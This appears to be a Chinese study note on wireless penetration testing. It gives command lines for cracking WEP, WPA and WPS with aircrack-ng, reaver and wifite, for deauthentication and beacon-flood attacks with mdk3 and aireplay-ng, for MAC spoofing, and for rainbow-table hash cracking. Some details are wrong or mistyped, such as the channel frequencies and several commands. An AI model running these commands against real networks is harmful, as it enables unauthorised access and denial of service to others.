无线渗透测试小识

监听wifi

无线网络中的信号是以广播模式发送的,所有用户就可以在传送管程中截获到这些信息。
1.网卡的工作模式
无线网卡是采用无线信号进行数据传输的终端。
4种模式:
广播模式:它的物理地址是0xffffff的帧为广播帧,工作在广播模式的网卡接受广播帧
多播传送:多播传送地址作为目的物理地址的帧可以被组内的其他主机同时接收,而组外主机却接收不到。但是如果将网卡设置为多播传送模式,它可以接收所有的多播传送帧,而不论它是不是组内成员。
直接模式:工作在混杂模式下的网卡只接收目的地址是自己mac地址的帧。
混杂模式:工作在混杂模式下的网卡,接受所有的流过网卡的帧。通信包捕获程序就是在这种模式下运行的。
2.

iwconfig 查看无线接口的配置信息 
ifconfig 查看接口的配置信息

3.Aircrack-ng套件中的小工具

aircrack-ng    破解WEP,以及WPA(字典攻击)密钥  
airdecap-ng 通过已经知道密钥来解密WEP或WPA嗅探数据
airmon-ng 将网卡设定为监听模式
aireplay-ng 数据包注入工具
airodump-ng 数据包嗅探,将无线网络数据输送到PCAP或IVS文件并显示网络信息
airtun-ng 创建虚拟管道
airolib-ng 保存、管理ESSID密码列表
packetforge-ng 创建数据包注入用的加密包
Tools 混合、转换工具
airbase-ng 软件模拟AP
airdecloak-ng 消除pcap文件中的WEP加密包
airdriver-ng 无线设备驱动管理工具
airolib-ng 保存、管理ESSID密码列表、计算对应的密钥
airserv-ng 允许不同的进程访问无线网卡
buddy-ng easside-ng文件的描述
esside-ng 和AP接入点通信(无WEP)
tkiptun-ng WPS/TKIP攻击
wesside-ng 自动破解WEP密钥

4
1)将无线网卡启动监听模式

airmon-ng start interface[channel] 启动监听模式
airmon-ng stop interface[channel] 关闭监听模式

2)将网卡设置为混杂模式

airmon-ng start wlan0

3)扫描网络范围

airodump-ng [选项] wlan0mon
-c 指定目标AP的工作信道
-i,-ivs 仅保存可用于破解的IVS数据报文
-w 指定一个自己希望保存的文件名,用来保存有效的IVS数据报文

参数解读

BSSID 	表示无线AP的mac地址 
PWR 网卡报告的信号水平,它主要取决于驱动。AP离计算机,信号越高。如果部分客户端的PWR为-1,那么说明该客户端不在当前网卡能监听到的范围内,但是能捕获到AP发往客户端的数据。如果所有的客户端PWR值都为-1,那么说明网卡驱动不支持信号水平报告。
Beasons 无线AP 发出的编号,每个AP在最低速率(1M)时差不多每秒会发送10个左右的beacon。
#Data 被捕捉到的数据分组分量
#/s 过去10秒内每秒捕获数据分组的数量
CH 信道号
MB 无线AP所支持的最大速率
ENC 使用的几码算法体系。OPN表示无加密,WEP?表示wep或者wpa/wpa2
CIPHER 检测到的加密算法
AUTH 使用认证协议 常用的有MGT(WPS/WPA2使用独立的认证服务器,平时我们常说的802.1x、radius、eap等),SKA(WEP的共享密钥),PSK(WPA/WPA2的预共享密钥) 或者OPN(WEP开放式)
ESSID 也就是所谓的SSID号
STATION 客户端的mac地址
Rate 输出速率
Lost 在过去10秒内丢失的数据分组,基于序列号检测。
Frames 客户端发送的数据分组数量
Probe v被客户端查探的ESSID.

5
强制客户端下线

mdk3 interface mode options 
mode: 指定测试模式。
a dos模式
b beacon洪水模式
d 解除验证/解除关联暴力模式
f mac过滤暴力模式
g wpa 降级测试
m 关闭开发
p 基本探测和ESSID暴力模式
w WIDS/WIPS混乱
x 802.1测试

例子:

mdk3 mon0 d -s 120 0 -c 1,6,11

分析数据包

1.过滤
比较运算符

eq     ==
ne !=
gt >
lt <
ge >=v
le <=

1)ip过滤

ip.addr==ip   
ip.src_host==ip 显示来源ip
ip.dst_host==ip 显示目标ip

2)端口过滤

tcp.port 
tcp.dstport==80
tcp.srcport==80

3)协议过滤

udp arp icmp http smtp ftp dns msnms ip ssl 等  
排除udp !udp或者not udp

4)包长度过滤

udp.length==26  udp本身固定长度8加上udp下面那块数据包之和
tcp.len>=7 表示ip数据包(tcp下面那块数据)不包括tcp本身
ip.len==94 除了以太网头固定长度14,其他都是ip.len,即从ip本身到最后
frame.len==119 表示整个数据包长度,从eth开始到最后

5)http模式过滤
指定get包

http.request.method=="GET" && http contains "host"
http.request.method=="GET" && http contains "User-Agent"

指定post包 如上
指定响应包

http contains "HTTP/1.1 200 OK" && http contains "Content-Type:"

6)表达式

!(arp.src==192.168.1.1) and !(arp.dst.proto_ipv4==192.168.1.11

2.802.11数据结构
无线数据包和有限数据包的主要不同在于额外的802.11头部。这是一个第二层的头部,包含与数据包和传输介质有关的额外信息。
802.11数据包的三种类型:管理帧、控制帧、数据帧
分析特定的包类型

wc.fc.type_subtype

分析特定频率的包

radiotap.channel.freq

信道 中心频率
1 2412
2 2317
13 2472

3.wep认证包
4.wpa认证包
5.RSSI 显示捕获数据包的射频信号强度
TX Rate 显示捕获数据包的数据率
Frequency/Channel 显示捕获数据包的频率和信道
6 qq使用ociq协议

WPS加密

1.wps支持两种模式:个人识别码模式和按钮模式
2.wps在某些设备上也是QQS
3.reaver是一个暴力破解wps加密的工具
将无线网卡设置为监听模式
例子:已知PIN码是12345678

reaver -i mon0 -b ap的mac地址 -p 12345678

不知时,暴力破解

reaver -i mon0 -b ap的mac地址 -vv

4.wifite是一款自动化wep和wpa破解工具
启动WiFite

wifite -pps 660

ctrl +c 停止扫描
选择ap编号
5.fern wifr cracker 可以破解并恢复wep、wpa和wps的无线网络密码

fern-wifi-cracker

WEP加密模式


1.wpd加密认证类型:
开放系统认证
共享密钥认证
2.Aircrack-ng工具主要是用于网络侦测、数据包嗅探以及wep和wpa/wpa2-pskf破解。
1)查看系统中的无限网路接口

iwconfig

2)将该无线网卡设置为监听模式

airmon-ng start mon0

3)扫描附近的wifi网络

airodump-ng wlan0mon0

4)选择wep模式加密的目标,捕获数据包,生成wireless-o1.ivs文件

airodump-ng --ivs -w wireless --bssid ap的mac  -c 6 wlan0mon 


--ivs 设置过滤,保存可用于破解的ivs包
-w 指定捕获数据包要保存的文件名
--bssid 来指定攻击目标的BSSID
-c 指定攻击目标ap的工作频道

5)捕获一定的数据包后,开始进行破解

aircrack-ng wireless-01.ivs

3.wifite工具,进行破解

WPA加密模式

1.

crunch 1 6 abcdef -o password.txt

2.pwgen工具可以说横溢难以忘记的随机密码或容易记住的密码

pwgen -1 -y

3.RainbowCrack创建彩虹表

rtgen 彩虹表生成工具,生成口令、散列值对照表 
rtsort 排序彩虹表,为rcrack提供输入
rcrack 使用排好序的彩虹表进行口令破解

例子:
1)创建一个md5算法加密的彩虹表,文件保存在/usr/share/rainbowcrack下。

rtgen md5 numeric 5 5 0 100 200 0

2)对生成的彩虹表进行排序

rtsort md5_numeric#5-5_0_100x200_0.rt

3)破解哈希值md5(11111)= b0baee9d279d34fa1dfd71aadb908c3f

rcrack  md5_numeric#5-5_0_100x200_0.rt -h b0baee9d279d34fa1dfd71aadb908c3f

4.Aircrack-ng工具破解
修改当前无线网卡的mac地址
1)查看本机无线网络接口

airmon-ng

2)停止无线网络接口

airmon-ng stop wlan0

3)修改无线网卡的mac地址为00:11:22:33:44:55

macchanger --mac 00:11:22:33:44:55

4)启用无线网络接口

arimon-ng start wlan0

5)捕获数据包

airodump-ng wlan0mon

6)捕获test无线网络的数据包,成功捕获握手包后,生成的文件名为wpa-01.cap

airodump-ng -c 1 -w wpa -bssid 目标ap的mac  wlan0mon`

如果一直没有捕获到握手包 可以使用aireplay-ng命令进行Deauth攻击,强制客户端重新连接到wifi网络

aireplay-ng -0 1 -a ap的mac地址 -c 客户端的mac地址 wlan0mon

7)Deauth攻击

aireplay-ng -0 1 -a ap的mac地址 -c 客户端的mac地址 wlan0mon

8)破解密码

aircrack-ng -w dic 捕获的cap文件

5.wifite

wifite -dict passowrd.txt

WPA+RADIUS加密模式









参考文章:
http://www.tup.tsinghua.edu.cn/booksCenter/book_06720901.html

当前网速较慢或者你使用的浏览器不支持博客特定功能,请尝试刷新或换用Chrome、Firefox等现代浏览器